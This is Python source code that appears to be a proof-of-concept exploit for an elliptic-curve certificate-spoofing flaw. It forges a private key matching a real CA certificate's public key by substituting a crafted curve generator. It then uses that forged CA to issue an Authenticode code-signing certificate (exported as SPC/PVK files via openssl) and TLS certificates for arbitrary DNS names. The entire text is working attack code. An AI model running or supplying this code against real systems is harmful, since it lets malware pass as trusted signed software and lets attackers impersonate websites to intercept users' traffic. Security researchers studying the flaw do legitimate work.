def exploit_certificate(
certificate: x509.Certificate,
) -> Tuple[ecdsa.keys.SigningKey, keys.ECPrivateKey]:
curve_name = certificate.public_key["algorithm"][
"parameters"].chosen.native
ec_private_key = generate_ec_private_key(curve_name)
k = ec_private_key["private_key"].native
parameters = ec_private_key["parameters"].chosen
nist_curve = curve_from_ec_parameters(parameters)
Qx, Qy = certificate.public_key["public_key"].to_coords()
Gx, Gy = get_exploit_generator(k, Qx, Qy, nist_curve)
parameters["base"] = keys.ECPoint.from_coords(Gx, Gy)
ec_private_key["parameters"] = parameters
ec_private_key["public_key"] = certificate.public_key["public_key"]
certificate.public_key["algorithm"]["parameters"] = parameters
exploit_curve = curve_from_ec_parameters(parameters)
signing_key = ecdsa.keys.SigningKey.from_secret_exponent(
k, curve=exploit_curve)
signed_digest_algorithm = x509.SignedDigestAlgorithm(
{"algorithm": "sha256_ecdsa"})
certificate["tbs_certificate"]["signature"] = signed_digest_algorithm
certificate["signature_algorithm"] = signed_digest_algorithm
sign_certificate(signing_key, certificate)
return (signing_key, ec_private_key)
def write_authenticode_certificate(
ca_cert: x509.Certificate,
ca_cert_orig: x509.Certificate,
signing_key: ecdsa.keys.SigningKey,
name: str,
subject: x509.Name,
) -> None:
private_key, public_key = generate_private_key("rsa:4096")
signed_digest_algorithm = x509.SignedDigestAlgorithm(
{"algorithm": "sha256_ecdsa"})
certificate = x509.Certificate({
"tbs_certificate": {
"version":
"v3",
"serial_number":
random_serial_number(),
"signature":
signed_digest_algorithm,
"issuer":
ca_cert.subject,
"validity": {
"not_before":
x509.UTCTime(
datetime.datetime(2018, 1, 1,
tzinfo=datetime.timezone.utc)),
"not_after":
x509.UTCTime(
datetime.datetime(2021, 1, 1,
tzinfo=datetime.timezone.utc)),
},
"subject":
subject,
"subject_public_key_info":
public_key,
"extensions": [
{
"extn_id": "basic_constraints",
"critical": True,
"extn_value": {
"ca": False
},
},
{
"extn_id": "key_usage",
"critical": True,
"extn_value": {"digital_signature"},
},
{
"extn_id":
"extended_key_usage",
"critical":
True,
"extn_value": [
"code_signing",
"1.3.6.1.4.1.311.2.1.21",
"1.3.6.1.4.1.311.2.1.22",
],
},
],
},
"signature_algorithm":
signed_digest_algorithm,
})
sign_certificate(signing_key, certificate)
with open(name + ".crt", "wb") as f:
write_pem(f, certificate, "CERTIFICATE")
write_pem(f, ca_cert_orig, "CERTIFICATE")
write_pem(f, ca_cert, "CERTIFICATE")
with open(name + ".key", "wb") as f:
write_pem(f, private_key, "PRIVATE KEY")
subprocess.check_call((
"openssl",
"crl2pkcs7",
"-nocrl",
"-certfile",
name + ".crt",
"-outform",
"DER",
"-out",
name + ".spc",
))
subprocess.check_call((
"openssl",
"rsa",
"-in",
name + ".key",
"-outform",
"PVK",
"-pvk-none",
"-out",
name + ".pvk",
))
def write_tls_certificate(
ca_cert: x509.Certificate,
ca_cert_orig: x509.Certificate,
signing_key: ecdsa.keys.SigningKey,
name: str,
subject: x509.Name,
subject_alt_names: Sequence[str],
) -> None:
private_key, public_key = generate_private_key("rsa:4096")
signed_digest_algorithm = x509.SignedDigestAlgorithm(
{"algorithm": "sha256_ecdsa"})
certificate = x509.Certificate({
"tbs_certificate": {
"version":
"v3",
"serial_number":
random_serial_number(),
"signature":
signed_digest_algorithm,
"issuer":
ca_cert_orig.subject,
"validity": {
"not_before":
x509.UTCTime(
datetime.datetime(2018, 1, 1,
tzinfo=datetime.timezone.utc)),
"not_after":
x509.UTCTime(
datetime.datetime(2021, 1, 1,
tzinfo=datetime.timezone.utc)),
},
"subject":
subject,
"subject_public_key_info":
public_key,
"extensions": [
{
"extn_id": "basic_constraints",
"critical": True,
"extn_value": {
"ca": False
},
},
{
"extn_id":
"subject_alt_name",
"critical":
False,
"extn_value": [
x509.GeneralName({"dns_name": dns_name})
for dns_name in subject_alt_names
],
},
{
"extn_id":
"certificate_policies",
"critical":
False,
"extn_value": [
{
"policy_identifier": "1.3.6.1.4.1.6449.1.2.1.5.1"
},
],
},
],
},
"signature_algorithm":
signed_digest_algorithm,
})
sign_certificate(signing_key, certificate)
with open(name + ".crt", "wb") as f:
write_pem(f, certificate, "CERTIFICATE")
write_pem(f, ca_cert_orig, "CERTIFICATE")
write_pem(f, ca_cert, "CERTIFICATE")
with open(name + ".key", "wb") as f:
write_pem(f, private_key, "PRIVATE KEY")
write_pem(f, certificate, "CERTIFICATE")
write_pem(f, ca_cert_orig, "CERTIFICATE")
write_pem(f, ca_cert, "CERTIFICATE")
